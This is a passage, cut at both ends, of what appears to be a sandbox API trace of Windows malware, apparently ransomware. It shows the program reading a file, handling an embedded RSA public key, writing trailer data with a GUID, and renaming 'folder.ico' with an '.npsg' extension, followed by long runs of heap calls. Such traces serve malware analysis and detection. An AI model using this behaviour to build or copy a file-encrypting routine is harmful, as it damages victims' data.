lpNewFilePointer=0x0) returned 1 [0238.795] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0238.826] SetFilePointer (in: hFile=0x644, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0238.826] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x74e6, lpOverlapped=0x0) returned 1 [0238.873] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.873] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.873] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.873] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a770) returned 1 [0238.874] CryptCreateHash (in: hProv=0x67a770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0238.874] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0238.875] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0238.875] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0238.875] GetLastError () returned 0x0 [0238.875] CryptDestroyHash (hHash=0x33f0408) returned 1 [0238.875] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0238.875] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0238.875] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0238.875] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0238.875] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90a38 [0238.876] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x74e6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.876] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0238.876] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0238.876] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0238.876] CloseHandle (hObject=0x644) returned 1 [0238.878] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e560 [0238.878] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8a0) returned 0x3b88cd0 [0238.878] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\folder.ico"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\folder.ico.npsg")) returned 1 [0238.879] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88cd0 | out: hHeap=0x620000) returned 1 [0238.879] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0238.879] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0238.881] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a87c0 | out: hHeap=0x620000) returned 1 [0238.881] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebf97a0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x74e6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="folder.ico", cAlternateFileName="")) returned 0 [0238.881] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0238.881] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c18b0 | out: hHeap=0x620000) returned 1 [0238.881] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a6e8 | out: hHeap=0x620000) returned 1 [0238.881] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0238.881] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a6e8 [0238.881] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0238.881] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.881] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.881] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.881] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.881] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.881] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.881] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.881] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.881] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.882] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.882] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.882] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.882] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.882] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.882] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.882] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.882] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.882] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.882] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.882] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.882] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.882] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0238.882] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.882] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.882] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.882] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.882] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0238.882] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.882] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0238.882] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.882] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.883] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.883] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.883] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.883] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.883] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0238.883] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.883] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.883] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.883] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0238.883] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0238.883] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.883] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.883] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0238.883] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0238.883] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.883] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.883] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.883] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.883] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.883] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.883] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.884] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.884] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.884] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.884] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0238.884] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.884] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.884] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.884] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0238.884] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.884] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.884] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.884] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.884] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.884] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.884] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.884] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.884] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.884] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.884] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.884] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.884] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.884] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.884] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.885] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.885] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.885] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.885] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.885] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.885] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.885] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.885] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.885] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.885] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.885] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.885] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.885] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.885] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.885] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.885] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.885] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.885] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0238.885] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.885] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0238.885] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.885] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.886] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.886] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.886] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.886] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.886] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.886] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0238.886] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.886] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0238.886] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.886] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.886] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0238.886] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0238.886] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.886] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.886] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0238.886] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0238.886] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.886] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.886] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.886] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.886] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.886] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.887] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.887] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.887] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.887] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.887] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.887] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0238.887] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.887] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0238.887] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.887] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.887] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0238.887] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.887] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.887] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.887] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0238.887] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.887] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.887] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.887] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.887] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.887] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.887] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.888] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.888] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.888] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.888] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.888] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.888] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.888] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.888] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.888] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.888] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.888] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.888] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.888] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.888] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.888] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.888] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.888] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.888] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.888] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.888] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.888] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.889] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.889] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.889] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.889] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.889] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0238.889] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.889] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0238.889] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.889] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.889] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.889] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.889] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.889] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.889] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0238.889] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0238.889] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.889] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.889] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0238.889] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0238.889] HeapFree (in: hHeap=0x620000, dwFlags=0x0, 